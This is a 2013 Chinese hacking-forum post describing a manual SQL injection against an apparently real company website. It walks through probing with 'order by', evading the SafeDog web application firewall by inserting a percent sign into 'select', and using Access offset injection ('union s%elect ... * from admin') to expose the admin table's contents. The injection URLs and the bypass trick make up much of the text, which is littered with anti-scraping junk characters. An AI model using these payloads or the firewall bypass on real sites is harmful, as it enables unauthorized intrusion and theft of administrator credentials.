找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2167|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。3 B% v# A9 T* a0 k: t- V' G
3 M! M, w0 _9 k# _6 `2 y

6 t, S* G2 _; K顺手加个admin
; C+ a% l; p& }( T
! {8 c0 [% q$ O# f! d
7 A6 g( F) r  s& v4 Y% _/ }1 l! ~3 I默认后台。
& _: A* h& A0 m/ W0 \- w! j  Y0 G回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
7 [0 M3 e5 m5 P  L7 T( i) Y% K1 o7 p  ~

& R. H4 M1 O1 v8 U3 X$ t. S+ @4 D# Y  q8 x6 g7 T& h
所以就不用御剑扫了,待会直接封IP。( l  N3 _. J9 Y  T

* {3 D/ ~% H  ]" a, P3 L9 z) g用order by语句判断是否存在注入。1 |/ F: Y+ o: H' Q+ x
http://www.xxx.com /product_show.asp?id=997 order by 15 i; m, A- M3 _7 Y" D' U
http://www.xxx.com /product_show.asp?id=997 order by 100
9 N. x$ q% ?1 k4 t$ Y) E现在存在注入,经测试后发现是9个字段。$ r; }5 v8 ?0 L

8 T4 |/ q9 b+ j& N' H0 Q接下来进行联合查询,猜是否存在admin表。1 b: ?8 W9 [. g
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
  d; u. E" i" R: }6 C0 X2 j% ]8 \) J* g7 H! u4 y2 N

! C- d5 P+ L8 r4 D+ ]2 z
2 S  d) X) R2 l* R% b* z& R) M在select中间加个%,se%lect绕过安全狗。& ?. p  ~5 N1 [: A' B4 p' z  K7 ?

: ^. M& }7 x! I5 u+ H# g# o2 \. ~" K+ X+ r" K* p2 x% z, H* g' c; O0 L% R
发现存在admin表,然后开始手工猜常用的字段。& a5 S  h! c' H3 s: t. K6 v6 V
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。( g% d# n' i6 Q  J5 u
: x, s& E5 w) Z3 J4 S
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。" ~- A$ i$ ]( w, c' Q. R$ \, g

+ I+ ^  x7 Q# |4 @" Z+ i* D科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
# ~& e% \/ S, z( |! U7 Lhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
7 D& j( [! t% w9 q' k* Y好了,敏感内容出显了。​
% e/ B0 j) Y; p+ ~8 ]$ p
1 @& _3 Y% {) n8 ?) P& B# a1 ^# {3 T- R3 n

5 c9 D% p7 J2 ]8 h5 v! {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表